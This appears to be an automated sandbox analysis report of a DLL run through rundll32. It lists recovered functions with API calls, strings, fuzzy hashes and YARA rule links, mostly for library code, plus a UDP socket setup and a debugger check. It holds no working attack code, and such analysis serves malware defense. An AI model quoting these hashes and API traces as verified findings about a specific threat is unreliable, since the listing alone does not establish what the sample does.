Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40

Uniqueness

Uniqueness Score: -1.00%

Function 10008000, Relevance: 1.5, APIs: 1, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 1000800B

Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: AllocateHeap_malloc
String ID:
API String ID: 501242067-0
Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91

Uniqueness

Uniqueness Score: -1.00%

Function 100236CE, Relevance: 1.5, APIs: 1, Instructions: 27
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

_malloc.LIBCMT ref: 100236ED

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: _malloc
String ID:
API String ID: 1579825452-0
Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0

Uniqueness

Uniqueness Score: -1.00%

Function 1002ACFB, Relevance: 1.5, APIs: 1, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog3_catch.LIBCMT ref: 1002AD02

Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
String ID:
API String ID: 1641187343-0
Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15

Uniqueness

Uniqueness Score: -1.00%

Function 10035645, Relevance: 1.5, APIs: 1, Instructions: 20
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 1003C7D2, Relevance: 66.4, APIs: 44, Instructions: 432COMMONLIBRARYCODE

Download Yara Rule

APIs

___getlocaleinfo.LIBCMT ref: 1003C809
___getlocaleinfo.LIBCMT ref: 1003C81E
___getlocaleinfo.LIBCMT ref: 1003C833
___getlocaleinfo.LIBCMT ref: 1003C848
___getlocaleinfo.LIBCMT ref: 1003C860
___getlocaleinfo.LIBCMT ref: 1003C875
___getlocaleinfo.LIBCMT ref: 1003C887
___getlocaleinfo.LIBCMT ref: 1003C89C
___getlocaleinfo.LIBCMT ref: 1003C8B4
___getlocaleinfo.LIBCMT ref: 1003C8C9

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ___getlocaleinfo
String ID:
API String ID: 1937885557-0
Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60

Uniqueness

Uniqueness Score: -1.00%

Function 10001160, Relevance: 10.6, APIs: 7, Instructions: 71networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(?,?), ref: 10001194
_memset.LIBCMT ref: 100011A8
htonl.WS2_32(00000000), ref: 100011C1
htons.WS2_32(?), ref: 100011D5
socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
bind.WS2_32(?,?,00000010), ref: 10001210
setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
String ID:
API String ID: 1003240404-0
Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55

Uniqueness

Uniqueness Score: -1.00%

Function 1001DFC0, Relevance: 9.1, APIs: 6, Instructions: 83windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32(?), ref: 1001DFE3

Part of subcall function 10024266: __EH_prolog3.LIBCMT ref: 1002426D
Part of subcall function 10024266: BeginPaint.USER32(?,?,00000004,10022D30,?,00000058,1001E0C9), ref: 10024299

SendMessageA.USER32(?,00000027,?,00000000), ref: 1001E031
GetSystemMetrics.USER32 ref: 1001E039
GetSystemMetrics.USER32 ref: 1001E044
GetClientRect.USER32 ref: 1001E05B
DrawIcon.USER32 ref: 1001E0AE

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: MetricsSystem$BeginClientDrawH_prolog3IconIconicMessagePaintRectSend
String ID:
API String ID: 1007970657-0
Opcode ID: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
Instruction ID: 44eb2ef316f0b933980e992ec3fa30d6a4f6e9fba2b57c8abd37e2d05c6bd9c1
Opcode Fuzzy Hash: 3259dfba3eec98d8480867ab092ef1825236dcdbd4a97db3d006f8f0a7e1c205
Instruction Fuzzy Hash: 4A31EA75A00119DFDB24CFA8C985FAEBBB5FB48300F108299E549E7241DA30AE84DF54

Uniqueness

Uniqueness Score: -1.00%

Function 1002129B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73libraryCOMMON

Download Yara Rule

APIs

_strcpy_s.LIBCMT ref: 100212CD

Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88

Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24

GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
__snwprintf_s.LIBCMT ref: 1002131A
LoadLibraryA.KERNEL32(?), ref: 10021355

Strings

LOC, xrefs: 100212C5

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
String ID: LOC
API String ID: 1016519223-519433814
Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0

Uniqueness

Uniqueness Score: -1.00%

Function 1002DB0D, Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 10031D3A
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
TerminateProcess.KERNEL32(00000000), ref: 10031D7D

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15

Uniqueness

Uniqueness Score: -1.00%

Function 10027958, Relevance: 6.0, APIs: 4, Instructions: 42keyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

GetKeyState.USER32 ref: 1002797E
GetKeyState.USER32 ref: 10027987
GetKeyState.USER32 ref: 10027990
SendMessageA.USER32(?,00000111,0000E146,00000000), ref: 100279A6

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: State$LongMessageSendWindow
String ID:
API String ID: 1063413437-0
Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0

Uniqueness

Uniqueness Score: -1.00%

Function 10024F01, Relevance: 3.0, APIs: 2, Instructions: 25COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 10024F24
GetVersionExA.KERNEL32(?), ref: 10024F3D

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Version_memset
String ID:
API String ID: 963298953-0
Opcode ID: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
Instruction ID: 60a6db508766d0176de5257cd9c04f851b8e12d18597fbeb5363c1cc45f9d795
Opcode Fuzzy Hash: 261500b53b9fbffb2ab7006eb20860b792d5709bcfa83feeb3a436b21e339e9d
Instruction Fuzzy Hash: 54F065799002189FEB50DB74DD46B8E77F8AB04304F9144E5950DD3282EA70AA48CB41

Uniqueness

Uniqueness Score: -1.00%

Function 10028DEC, Relevance: 33.4, APIs: 16, Strings: 3, Instructions: 179COMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 10028DF6

Part of subcall function 1002B0BB: __EH_prolog3.LIBCMT ref: 1002B0C2

CallNextHookEx.USER32(?,?,?,?), ref: 10028E3A

Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71

GetClassLongA.USER32 ref: 10028E7E
GlobalGetAtomNameA.KERNEL32 ref: 10028EA8
SetWindowLongA.USER32(?,000000FC,Function_00027C85), ref: 10028EFD
_memset.LIBCMT ref: 10028F47
GetClassLongA.USER32 ref: 10028F77
GetClassNameA.USER32(?,?,00000100), ref: 10028F98
GetWindowLongA.USER32 ref: 10028FBC
GetPropA.USER32 ref: 10028FD6
SetPropA.USER32 ref: 10028FE1
GetPropA.USER32 ref: 10028FE9
GlobalAddAtomA.KERNEL32 ref: 10028FF1
SetWindowLongA.USER32(?,000000FC,Function_00028C9F), ref: 10028FFF
CallNextHookEx.USER32(?,00000003,?,?), ref: 10029017
UnhookWindowsHookEx.USER32(?), ref: 1002902B

Strings

#32768, xrefs: 10028F59, 10028F5E, 10028FA8
ime, xrefs: 10028EB1
AfxOldWndProc423, xrefs: 10028FCF, 10028FD4, 10028FDF, 10028FE7, 10028FF0

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: Long$ClassHookPropWindow$AtomCallGlobalNameNext$Exception@8H_prolog3H_prolog3_ThrowUnhookWindows_memset
String ID: #32768$AfxOldWndProc423$ime
API String ID: 867647115-4034971020
Opcode ID: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
Instruction ID: c9f41a1409c6bb8d0fa3b18bb25e3997143979ac063bd30542687b89172f9a1c
Opcode Fuzzy Hash: 028737d45415cf4fc653e4401d117fb93ecf855678ad16e5d4e8c367e2bfe641
Instruction Fuzzy Hash: 2361027590122AAFDB11DF61DD88B9E7BB8FF093A1F920154F509E6191DB30DE80CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 100214CB, Relevance: 31.7, APIs: 14, Strings: 4, Instructions: 158libraryloaderCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 100214D5
GetModuleHandleA.KERNEL32(kernel32.dll,0000015C,1002179C,?,?), ref: 10021505
GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 10021519
ConvertDefaultLocale.KERNEL32(?), ref: 10021555
ConvertDefaultLocale.KERNEL32(?), ref: 10021563
GetProcAddress.KERNEL32(?,GetSystemDefaultUILanguage), ref: 10021580
ConvertDefaultLocale.KERNEL32(?), ref: 100215AB
ConvertDefaultLocale.KERNEL32(000003FF), ref: 100215B4
GetModuleHandleA.KERNEL32(ntdll.dll), ref: 100215CD
EnumResourceLanguagesA.KERNEL32 ref: 100215EA
ConvertDefaultLocale.KERNEL32(?), ref: 1002161D
ConvertDefaultLocale.KERNEL32(00000000), ref: 10021626
GetModuleFileNameA.KERNEL32(10000000,?,00000105), ref: 10021669
_memset.LIBCMT ref: 10021689

Strings

GetUserDefaultUILanguage, xrefs: 1002150D
ntdll.dll, xrefs: 100215C8
kernel32.dll, xrefs: 100214EE
GetSystemDefaultUILanguage, xrefs: 10021565

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: ConvertDefaultLocale$Module$AddressHandleProc$EnumFileH_prolog3_LanguagesNameResource_memset
String ID: GetSystemDefaultUILanguage$GetUserDefaultUILanguage$kernel32.dll$ntdll.dll
API String ID: 3537336938-2299501126
Opcode ID: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction ID: 3754a4cc769aa270db1ce7901eb040107ed5b3d0b04ae9dca27c5b132e5f9257
Opcode Fuzzy Hash: 482ed3ff8adc9dfca9f4a6a5a3eecf6aee0f7f9e6cd518195f59097e54c4c985
Instruction Fuzzy Hash: 77515974C002289BCB61DF659C44BEDBAF4EB59300F5002EAE988E3291DB749E81CF94

Uniqueness

Uniqueness Score: -1.00%

Function 10024F5B, Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(USER32,00000000,00000000,76925D80,100250B0,?,?,?,?,?,?,?,10026FEC,00000000,00000002,00000028), ref: 10024F86
GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 10024FA2
GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 10024FB3
GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 10024FC4
GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 10024FD5
GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 10024FE6
GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 10024FF7
GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 10025008

Strings

EnumDisplayMonitors, xrefs: 10024FE0
MonitorFromRect, xrefs: 10024FBE
MonitorFromWindow, xrefs: 10024FAD
MonitorFromPoint, xrefs: 10024FCF
USER32, xrefs: 10024F7C
EnumDisplayDevicesA, xrefs: 10025002
GetMonitorInfoA, xrefs: 10024FF1
GetSystemMetrics, xrefs: 10024F9C

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682054997.0000000010047000.00000002.00020000.sdmp Download File
Associated: 00000006.00000002.682103927.0000000010051000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682128032.0000000010054000.00000008.00020000.sdmp Download File
Associated: 00000006.00000002.682291841.0000000010084000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682307709.0000000010086000.00000004.00020000.sdmp Download File
Associated: 00000006.00000002.682328913.0000000010089000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_10000000_rundll32.jbxd

Similarity

API ID: AddressProc$HandleModule
String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
API String ID: 667068680-68207542
Opcode ID: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
Instruction ID: f18cf552d00ebf4573e19fd52f8b2344fe61d2491b1b7e62cf44cba2888c0d7d
Opcode Fuzzy Hash: 2c2d105ab76555674e553128ad85fc5a2fe8f9f5109b4f1e6913bbfff899dba8
Instruction Fuzzy Hash: 15213672D10170ABE752EF749DC886D7AF8F64C2827A1083FE302DA12AD7724540DF98

Uniqueness

Uniqueness Score: -1.00%

Function 10026EFC, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1002A3F0: GetWindowLongA.USER32 ref: 1002A3FB

GetParent.USER32(?), ref: 10026F2B
SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 10026F4E
GetWindowRect.USER32 ref: 10026F68
GetWindowLongA.USER32 ref: 10026F7E
CopyRect.USER32 ref: 10026FCB
CopyRect.USER32 ref: 10026FD5
GetWindowRect.USER32 ref: 10026FDE
CopyRect.USER32 ref: 10026FFA

Strings

(, xrefs: 10026F94

Memory Dump Source

Source File: 00000006.00000002.681833755.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000006.00000002.681819863.0000000010000000.00000002.00020000.sdmp Download File
